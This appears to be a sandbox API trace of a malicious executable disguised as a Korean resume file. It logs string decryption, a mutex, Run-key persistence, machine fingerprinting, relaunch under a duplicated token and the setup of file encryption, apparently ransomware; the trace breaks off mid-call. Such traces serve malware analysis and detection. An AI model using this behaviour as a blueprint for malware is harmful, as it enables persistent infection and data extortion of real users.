[0052.110] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5661b8 | out: hHeap=0x550000) returned 1 [0052.110] GetProcessHeap () returned 0x550000 [0052.110] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x4) returned 0x566950 [0052.110] GetProcessHeap () returned 0x550000 [0052.110] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xe0) returned 0x5661b8 [0052.110] CryptImportKey (in: hProv=0x564928, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x566100) returned 1 [0052.110] CryptDecrypt (in: hKey=0x566100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5661b8, pdwDataLen=0x18ff48 | out: pbData=0x5661b8, pdwDataLen=0x18ff48) returned 1 [0052.110] CryptDestroyKey (hKey=0x566100) returned 1 [0052.110] GetProcessHeap () returned 0x550000 [0052.110] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566960 [0052.110] GetProcessHeap () returned 0x550000 [0052.110] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xc) returned 0x565e40 [0052.110] GetProcessHeap () returned 0x550000 [0052.110] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566970 [0052.110] GetProcessHeap () returned 0x550000 [0052.110] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xe) returned 0x565e58 [0052.110] GetProcessHeap () returned 0x550000 [0052.110] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566980 [0052.110] GetProcessHeap () returned 0x550000 [0052.110] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x14) returned 0x566100 [0052.110] GetProcessHeap () returned 0x550000 [0052.111] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566990 [0052.111] GetProcessHeap () returned 0x550000 [0052.111] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x16) returned 0x566120 [0052.111] GetProcessHeap () returned 0x550000 [0052.111] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5669a0 [0052.111] GetProcessHeap () returned 0x550000 [0052.111] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x564370 [0052.111] GetProcessHeap () returned 0x550000 [0052.111] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5669b0 [0052.111] GetProcessHeap () returned 0x550000 [0052.111] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22) returned 0x5662a0 [0052.111] GetProcessHeap () returned 0x550000 [0052.111] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5669c0 [0052.111] GetProcessHeap () returned 0x550000 [0052.111] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5669d0 [0052.111] GetProcessHeap () returned 0x550000 [0052.111] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5669e0 [0052.111] GetProcessHeap () returned 0x550000 [0052.111] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1a) returned 0x5643c0 [0052.111] GetProcessHeap () returned 0x550000 [0052.111] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5669f0 [0052.111] GetProcessHeap () returned 0x550000 [0052.111] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x565e70 [0052.111] GetProcessHeap () returned 0x550000 [0052.111] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566a00 [0052.111] GetProcessHeap () returned 0x550000 [0052.111] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566a10 [0052.111] GetProcessHeap () returned 0x550000 [0052.111] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566a20 [0052.111] GetProcessHeap () returned 0x550000 [0052.111] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566a30 [0052.112] GetProcessHeap () returned 0x550000 [0052.112] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5661b8 | out: hHeap=0x550000) returned 1 [0052.112] GetProcessHeap () returned 0x550000 [0052.112] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x24) returned 0x5661b8 [0052.112] GetProcessHeap () returned 0x550000 [0052.112] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566a40 [0052.112] GetProcessHeap () returned 0x550000 [0052.112] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566c70 [0052.112] CryptImportKey (in: hProv=0x564928, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5661e8) returned 1 [0052.112] CryptDecrypt (in: hKey=0x5661e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566c70, pdwDataLen=0x18ff48 | out: pbData=0x566c70, pdwDataLen=0x18ff48) returned 1 [0052.112] CryptDestroyKey (hKey=0x5661e8) returned 1 [0052.112] GetProcessHeap () returned 0x550000 [0052.112] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566a50 [0052.112] GetProcessHeap () returned 0x550000 [0052.112] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x12) returned 0x566140 [0052.112] GetProcessHeap () returned 0x550000 [0052.112] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1a) returned 0x564410 [0052.112] GetProcessHeap () returned 0x550000 [0052.112] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566c70 | out: hHeap=0x550000) returned 1 [0052.113] GetShellWindow () returned 0x100f2 [0052.113] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x41aa68 | out: lpdwProcessId=0x41aa68) returned 0x458 [0052.113] GetProcessHeap () returned 0x550000 [0052.113] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x564438 [0052.113] CryptImportKey (in: hProv=0x564928, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5661e8) returned 1 [0052.113] CryptDecrypt (in: hKey=0x5661e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x564438, pdwDataLen=0x18ff48 | out: pbData=0x564438, pdwDataLen=0x18ff48) returned 1 [0052.113] CryptDestroyKey (hKey=0x5661e8) returned 1 [0052.114] GetProcessHeap () returned 0x550000 [0052.114] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x564460 [0052.114] CryptImportKey (in: hProv=0x564928, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5661e8) returned 1 [0052.114] CryptDecrypt (in: hKey=0x5661e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x564460, pdwDataLen=0x18ff48 | out: pbData=0x564460, pdwDataLen=0x18ff48) returned 1 [0052.114] CryptDestroyKey (hKey=0x5661e8) returned 1 [0052.114] GetProcessHeap () returned 0x550000 [0052.114] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x564488 [0052.114] CryptImportKey (in: hProv=0x564928, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5661e8) returned 1 [0052.114] CryptDecrypt (in: hKey=0x5661e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x564488, pdwDataLen=0x18ff48 | out: pbData=0x564488, pdwDataLen=0x18ff48) returned 1 [0052.114] CryptDestroyKey (hKey=0x5661e8) returned 1 [0052.114] GetProcessHeap () returned 0x550000 [0052.114] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x5644b0 [0052.114] CryptImportKey (in: hProv=0x564928, pbData=0x18fcb8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5661e8) returned 1 [0052.114] CryptDecrypt (in: hKey=0x5661e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5644b0, pdwDataLen=0x18fd24 | out: pbData=0x5644b0, pdwDataLen=0x18fd24) returned 1 [0052.114] CryptDestroyKey (hKey=0x5661e8) returned 1 [0052.114] GetProcessHeap () returned 0x550000 [0052.114] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x60) returned 0x5661e8 [0052.114] CryptImportKey (in: hProv=0x564928, pbData=0x18fcb8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x566250) returned 1 [0052.114] CryptDecrypt (in: hKey=0x566250, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5661e8, pdwDataLen=0x18fd24 | out: pbData=0x5661e8, pdwDataLen=0x18fd24) returned 1 [0052.114] CryptDestroyKey (hKey=0x566250) returned 1 [0052.114] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x18fd28, nSize=0x104 | out: lpBuffer="C:") returned 0x2 [0052.115] GetProcessHeap () returned 0x550000 [0052.115] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5644b0 | out: hHeap=0x550000) returned 1 [0052.115] GetProcessHeap () returned 0x550000 [0052.115] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x5644b0 [0052.115] CryptImportKey (in: hProv=0x564928, pbData=0x18fcb8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x566250) returned 1 [0052.115] CryptDecrypt (in: hKey=0x566250, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5644b0, pdwDataLen=0x18fd24 | out: pbData=0x5644b0, pdwDataLen=0x18fd24) returned 1 [0052.115] CryptDestroyKey (hKey=0x566250) returned 1 [0052.115] GetProcessHeap () returned 0x550000 [0052.115] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x60) returned 0x5662d0 [0052.115] CryptImportKey (in: hProv=0x564928, pbData=0x18fcb8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x566250) returned 1 [0052.115] CryptDecrypt (in: hKey=0x566250, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5662d0, pdwDataLen=0x18fd24 | out: pbData=0x5662d0, pdwDataLen=0x18fd24) returned 1 [0052.115] CryptDestroyKey (hKey=0x566250) returned 1 [0052.115] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x18fd28, nSize=0x104 | out: lpBuffer="C:") returned 0x2 [0052.115] GetProcessHeap () returned 0x550000 [0052.115] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5644b0 | out: hHeap=0x550000) returned 1 [0052.115] GetProcessHeap () returned 0x550000 [0052.115] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1e) returned 0x5644b0 [0052.115] GetProcessHeap () returned 0x550000 [0052.115] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x12) returned 0x566250 [0052.115] GetProcessHeap () returned 0x550000 [0052.115] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x5644d8 [0052.115] CryptImportKey (in: hProv=0x564928, pbData=0x18fee8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x566338) returned 1 [0052.115] CryptDecrypt (in: hKey=0x566338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5644d8, pdwDataLen=0x18ff48 | out: pbData=0x5644d8, pdwDataLen=0x18ff48) returned 1 [0052.115] CryptDestroyKey (hKey=0x566338) returned 1 [0052.116] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="m23071644") returned 0xa8 [0052.183] GetLastError () returned 0x0 [0052.183] GetProcessHeap () returned 0x550000 [0052.183] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5644d8 | out: hHeap=0x550000) returned 1 [0052.183] GetProcessHeap () returned 0x550000 [0052.183] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x60) returned 0x566338 [0052.183] CryptImportKey (in: hProv=0x564928, pbData=0x18f6a0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5663a0) returned 1 [0052.183] CryptDecrypt (in: hKey=0x5663a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566338, pdwDataLen=0x18f704 | out: pbData=0x566338, pdwDataLen=0x18f704) returned 1 [0052.183] CryptDestroyKey (hKey=0x5663a0) returned 1 [0052.183] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x18f6f0 | out: phkResult=0x18f6f0*=0xa4) returned 0x0 [0052.184] RegSetValueExW (in: hKey=0xa4, lpValueName="1", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe\"", cbData=0xaa | out: lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe\"") returned 0x0 [0052.185] RegCloseKey (hKey=0xa4) returned 0x0 [0052.185] GetProcessHeap () returned 0x550000 [0052.185] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566338 | out: hHeap=0x550000) returned 1 [0052.185] GetProcessHeap () returned 0x550000 [0052.185] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566c70 [0052.185] CryptImportKey (in: hProv=0x564928, pbData=0x18fa90, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x566338) returned 1 [0052.185] CryptDecrypt (in: hKey=0x566338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566c70, pdwDataLen=0x18fb00 | out: pbData=0x566c70, pdwDataLen=0x18fb00) returned 1 [0052.185] CryptDestroyKey (hKey=0x566338) returned 1 [0052.185] GetProcessHeap () returned 0x550000 [0052.185] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x5644d8 [0052.185] CryptImportKey (in: hProv=0x564928, pbData=0x18fa90, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x566338) returned 1 [0052.185] CryptDecrypt (in: hKey=0x566338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5644d8, pdwDataLen=0x18fb00 | out: pbData=0x5644d8, pdwDataLen=0x18fb00) returned 1 [0052.185] CryptDestroyKey (hKey=0x566338) returned 1 [0052.185] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fafc | out: phkResult=0x18fafc*=0xa4) returned 0x0 [0052.185] RegQueryValueExA (in: hKey=0xa4, lpValueName="ProductId", lpReserved=0x0, lpType=0x0, lpData=0x18fb08, lpcbData=0x18fb04*=0x400 | out: lpType=0x0, lpData=0x18fb08*=0x30, lpcbData=0x18fb04*=0x18) returned 0x0 [0052.186] RegCloseKey (hKey=0xa4) returned 0x0 [0052.186] GetProcessHeap () returned 0x550000 [0052.186] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566c70 | out: hHeap=0x550000) returned 1 [0052.186] GetProcessHeap () returned 0x550000 [0052.186] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5644d8 | out: hHeap=0x550000) returned 1 [0052.186] GetProcessHeap () returned 0x550000 [0052.186] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x5644d8 [0052.186] CryptImportKey (in: hProv=0x564928, pbData=0x18f870, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x566338) returned 1 [0052.186] CryptDecrypt (in: hKey=0x566338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5644d8, pdwDataLen=0x18f8d4 | out: pbData=0x5644d8, pdwDataLen=0x18f8d4) returned 1 [0052.186] CryptDestroyKey (hKey=0x566338) returned 1 [0052.186] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x18f8d8, nSize=0x104 | out: lpBuffer="C:") returned 0x2 [0052.186] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18f8d0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18f8d0*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0052.187] GetProcessHeap () returned 0x550000 [0052.187] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5644d8 | out: hHeap=0x550000) returned 1 [0052.187] wsprintfA (in: param_1=0x18fb1f, param_2="-%08X" | out: param_1="-9C354B42") returned 9 [0052.187] GetProcessHeap () returned 0x550000 [0052.187] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566a60 [0052.187] GetProcessHeap () returned 0x550000 [0052.187] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566c70 [0052.188] GetProcessHeap () returned 0x550000 [0052.188] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x80) returned 0x566338 [0052.188] CryptImportKey (in: hProv=0x564928, pbData=0x18fea0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5663c0) returned 1 [0052.188] CryptDecrypt (in: hKey=0x5663c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566338, pdwDataLen=0x18ff08 | out: pbData=0x566338, pdwDataLen=0x18ff08) returned 1 [0052.188] CryptDestroyKey (hKey=0x5663c0) returned 1 [0052.188] GetProcessHeap () returned 0x550000 [0052.188] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x80) returned 0x5663c0 [0052.188] CryptImportKey (in: hProv=0x564928, pbData=0x18fea0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x568458) returned 1 [0052.188] CryptDecrypt (in: hKey=0x568458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5663c0, pdwDataLen=0x18ff08 | out: pbData=0x5663c0, pdwDataLen=0x18ff08) returned 1 [0052.188] CryptDestroyKey (hKey=0x568458) returned 1 [0052.188] GetExitCodeProcess (in: hProcess=0x0, lpExitCode=0x18ff28 | out: lpExitCode=0x18ff28*=0x5644d8) returned 0 [0052.188] Wow64DisableWow64FsRedirection (in: OldValue=0x18ff30 | out: OldValue=0x18ff30*=0x0) returned 1 [0052.188] GetCurrentProcessId () returned 0xa30 [0052.189] wsprintfW (in: param_1=0x18f708, param_2="\"%s\" n%u" | out: param_1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe\" n2608") returned 90 [0052.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x454) returned 0xa4 [0052.189] OpenProcessToken (in: ProcessHandle=0xa4, DesiredAccess=0x2000000, TokenHandle=0x18f694 | out: TokenHandle=0x18f694*=0xac) returned 1 [0052.189] DuplicateTokenEx (in: hExistingToken=0xac, dwDesiredAccess=0x2000000, lpTokenAttributes=0x18f6a0, ImpersonationLevel=0x2, TokenType=0x1, phNewToken=0x18f690 | out: phNewToken=0x18f690*=0xb0) returned 1 [0052.189] CreatePipe (in: hReadPipe=0x18f69c, hWritePipe=0x18f698, lpPipeAttributes=0x18f6a0, nSize=0x0 | out: hReadPipe=0x18f69c*=0xb8, hWritePipe=0x18f698*=0xbc) returned 1 [0052.190] CreateProcessWithTokenW (in: hToken=0xb0, dwLogonFlags=0x0, lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe\" n2608", dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0xbc, hStdError=0xbc), lpProcessInformation=0x18f6b0 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe\" n2608", lpProcessInformation=0x18f6b0*(hProcess=0x108, hThread=0x10c, dwProcessId=0xab0, dwThreadId=0xaac)) returned 1 [0052.352] CloseHandle (hObject=0x10c) returned 1 [0052.352] CloseHandle (hObject=0xb0) returned 1 [0052.352] CloseHandle (hObject=0xac) returned 1 [0052.352] CloseHandle (hObject=0xa4) returned 1 [0052.352] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0052.352] SetErrorMode (uMode=0x1) returned 0x0 [0052.353] GetLogicalDrives () returned 0x4 [0052.353] GetProcessHeap () returned 0x550000 [0052.353] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566e20 [0052.353] CryptImportKey (in: hProv=0x564928, pbData=0x18fa20, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x569ad8) returned 1 [0052.353] CryptDecrypt (in: hKey=0x569ad8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566e20, pdwDataLen=0x18fa90 | out: pbData=0x566e20, pdwDataLen=0x18fa90) returned 1 [0052.353] CryptDestroyKey (hKey=0x569ad8) returned 1 [0052.353] GetProcessHeap () returned 0x550000 [0052.353] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x567fb8 [0052.353] CryptImportKey (in: hProv=0x564928, pbData=0x18fa20, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x569ad8) returned 1 [0052.353] CryptDecrypt (in: hKey=0x569ad8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x567fb8, pdwDataLen=0x18fa90 | out: pbData=0x567fb8, pdwDataLen=0x18fa90) returned 1 [0052.353] CryptDestroyKey (hKey=0x569ad8) returned 1 [0052.353] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fa8c | out: phkResult=0x18fa8c*=0xa4) returned 0x0 [0052.353] RegQueryValueExA (in: hKey=0xa4, lpValueName="ProductId", lpReserved=0x0, lpType=0x0, lpData=0x18fa98, lpcbData=0x18fa94*=0x400 | out: lpType=0x0, lpData=0x18fa98*=0x30, lpcbData=0x18fa94*=0x18) returned 0x0 [0052.353] RegCloseKey (hKey=0xa4) returned 0x0 [0052.354] GetProcessHeap () returned 0x550000 [0052.354] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566e20 | out: hHeap=0x550000) returned 1 [0052.354] GetProcessHeap () returned 0x550000 [0052.354] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x567fb8 | out: hHeap=0x550000) returned 1 [0052.354] GetProcessHeap () returned 0x550000 [0052.354] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x567fb8 [0052.354] CryptImportKey (in: hProv=0x564928, pbData=0x18f800, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x569ad8) returned 1 [0052.354] CryptDecrypt (in: hKey=0x569ad8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x567fb8, pdwDataLen=0x18f864 | out: pbData=0x567fb8, pdwDataLen=0x18f864) returned 1 [0052.354] CryptDestroyKey (hKey=0x569ad8) returned 1 [0052.354] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x18f868, nSize=0x104 | out: lpBuffer="C:") returned 0x2 [0052.354] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18f860, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18f860*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0052.354] GetProcessHeap () returned 0x550000 [0052.354] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x567fb8 | out: hHeap=0x550000) returned 1 [0052.354] wsprintfA (in: param_1=0x18faaf, param_2="-%08X" | out: param_1="-9C354B42") returned 9 [0052.354] wsprintfW (in: param_1=0x18fec0, param_2="\\\\.\\%c:" | out: param_1="\\\\.\\C:") returned 6 [0052.354] wsprintfW (in: param_1=0x18fed0, param_2="%c:\\" | out: param_1="C:\\") returned 3 [0052.355] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0052.355] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18feb0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18feb0*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0052.355] GetProcessHeap () returned 0x550000 [0052.355] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x34) returned 0x569ad8 [0052.355] wsprintfW (in: param_1=0x569ad8, param_2="%c:" | out: param_1="C:") returned 2 [0052.355] CreateFileW (lpFileName="\\\\.\\C:" (normalized: "c:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0052.355] DeviceIoControl (in: hDevice=0xa4, dwIoControlCode=0x560000, lpInBuffer=0x0, nInBufferSize=0x0, lpOutBuffer=0x18fee0, nOutBufferSize=0x20, lpBytesReturned=0x18feb4, lpOverlapped=0x0 | out: lpOutBuffer=0x18fee0*, lpBytesReturned=0x18feb4*=0x20, lpOverlapped=0x0) returned 1 [0052.356] CloseHandle (hObject=0xa4) returned 1 [0052.356] GetProcessHeap () returned 0x550000 [0052.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566a90 [0052.356] GetProcessHeap () returned 0x550000 [0052.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56ca58 [0052.356] CryptGenRandom (in: hProv=0x564928, dwLen=0x20, pbBuffer=0x56ca64 | out: pbBuffer=0x56ca64) returned 1 [0052.356] GetProcessHeap () returned 0x550000 [0052.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cba8 [0052.356] CryptGenRandom (in: hProv=0x564928, dwLen=0x20, pbBuffer=0x56cbb4 | out: pbBuffer=0x56cbb4) returned 1 [0052.356] GetProcessHeap () returned 0x550000 [0052.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x567fb8 [0052.356] CryptImportKey (in: hProv=0x564928, pbData=0x18fea0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x56d208) returned 1 [0052.356] CryptDecrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x567fb8, pdwDataLen=0x18ff08 | out: pbData=0x567fb8, pdwDataLen=0x18ff08) returned 1 [0052.357] CryptDestroyKey (hKey=0x56d208) returned 1 [0052.357] GetProcessHeap () returned 0x550000 [0052.357] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x80) returned 0x569940 [0052.357] GetProcessHeap () returned 0x550000 [0052.357] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x80) returned 0x56c928 [0052.357] CryptImportKey (in: hProv=0x564928, pbData=0x5651b8, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x0, phKey=0x18fee8 | out: phKey=0x18fee8*=0x5699c8) returned 1 [0052.357] CryptEncrypt (in: hKey=0x5699c8, hHash=0x0, Final=0, 